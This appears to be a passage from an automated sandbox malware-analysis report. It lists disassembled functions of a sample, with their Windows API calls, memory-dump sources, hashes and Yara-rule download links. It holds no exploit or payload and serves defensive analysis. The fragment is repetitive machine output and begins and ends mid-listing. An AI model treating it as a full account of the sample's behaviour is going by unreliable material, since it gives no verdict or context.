                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_GetImageCount
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-4246500564
                                                                                                                                                                                                                                                                                                • Opcode ID: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                                • Instruction ID: 982047e8d717f41167e3cd9be7dffe01ffe3abe97b222393831f80d9b05f459f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F07475601B45CFD7208F68D948A87B7E4FB58715B40892EE5AEC3A51D778E880CB08
                                                                                                                                                                                                                                                                                                Function 005FE5EA Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 471a6d175e438b999421d817673712101ebc98b14ca97b5bbdd216f1f1212e26
                                                                                                                                                                                                                                                                                                • Instruction ID: a4aa5fe1afe6373b8f220277e30d33a61fd8c1e725b86ca142f017733e7708a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471a6d175e438b999421d817673712101ebc98b14ca97b5bbdd216f1f1212e26
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9851E27260124EAFDB289F10E946B7A7FA5FF94310F14452DEA06872B1E739EC41CB90
                                                                                                                                                                                                                                                                                                Function 0042C850 Relevance: 6.1, APIs: 4, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C88F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 166717107-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ae2c4f83a303b8bce0181d8b555b548ed397ea70dfa58a9d15d9eacc3878f9d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC511AB1204301AFD714DE28CD85FABB7EAFBC4704F008A1DF99953694DBB0AD49CA65
                                                                                                                                                                                                                                                                                                Function 00410560 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                                • Instruction ID: ce4c3b2ba86c6f6c119685c1f909f4ca062621dcfedb5de8325838dac45ff1a4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2314071244305AFD204DF61CCC5FABB3E9EBC8748F048A0CF58957290D674EA468B65
                                                                                                                                                                                                                                                                                                Function 00424850 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 80sleepCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                                • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                                • API String ID: 451317006-1228882529
                                                                                                                                                                                                                                                                                                • Opcode ID: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                                • Instruction ID: 2aae77fe05b5572fc9a22550ba8b2e73634bf3b6c40b7b563c05c91186231963
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6021D439B102224BD724DE68DD84BE73351DFC4325F5A4279ED098F382DB66EC468299
                                                                                                                                                                                                                                                                                                Function 00463530 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                                • Instruction ID: 72788d8031d8da8ebdf27af98cafe7d3eb32084a5d4fa9d01f0a72895e77951c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8711C4716003412BE3109B169C46BAB769CEBD1710F44483EF548E6151EAA8EA098BEF
                                                                                                                                                                                                                                                                                                Function 005FDE91 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005FDEAD
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005FDEC6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 968c789e47ac104a089a63a3d9a647db915dc32d09b6e71ab0484a4db3cd1788
                                                                                                                                                                                                                                                                                                • Instruction ID: fb580ab6c100dca722d1fa83e6dae7c11b726cf200d352632489135a9b477385
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 968c789e47ac104a089a63a3d9a647db915dc32d09b6e71ab0484a4db3cd1788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A801F13224831A6EB71426B56C8A97A3FBBFB52771720032AF714851F1EE294C019161
                                                                                                                                                                                                                                                                                                Function 0046D000 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                                • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                                • Instruction ID: d6e58a44651a1d3402cb24b8e4ad2f5d6b0251b9aafb2ead04931a23fc49c706
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E016771F142189FD730AF6AEC8096B37DCE756318F15083BE108D3211DA79A442877D
                                                                                                                                                                                                                                                                                                Function 00467680 Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                                • Instruction ID: 05ecc198b00069830d56908e8e3e5e7e1269b8f0e776762def572f81c0fca120
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF01D717C0B027AE2309A68DC82FA7A2A86B94B02F15582DF359FB1D196B875018E58
                                                                                                                                                                                                                                                                                                Function 00460400 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 89a6921c06f24090ffa03df58177ed7f9d03450d2280ec600551e15521660d28
                                                                                                                                                                                                                                                                                                • Instruction ID: d8bfd7cdfac141d9cfdb0ffece5a98f1ca78eb3dd6e2b02cd9253dc2d6ef05f2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89a6921c06f24090ffa03df58177ed7f9d03450d2280ec600551e15521660d28
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED137756083409FC314DF69C98092BFBE4BFC8314F05896EF99997311E739E8058BA6
                                                                                                                                                                                                                                                                                                Function 0045D2A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                                • Instruction ID: 5dffe6ef64173943b566a41739161ce8ce63ae2a9ff69b85a90aeb8992a9e3ab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24A17A71A043099FC324EF68C98096AB7F5FF89305F14892EE89687312D774F949CB5A
                                                                                                                                                                                                                                                                                                Function 0045D020 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
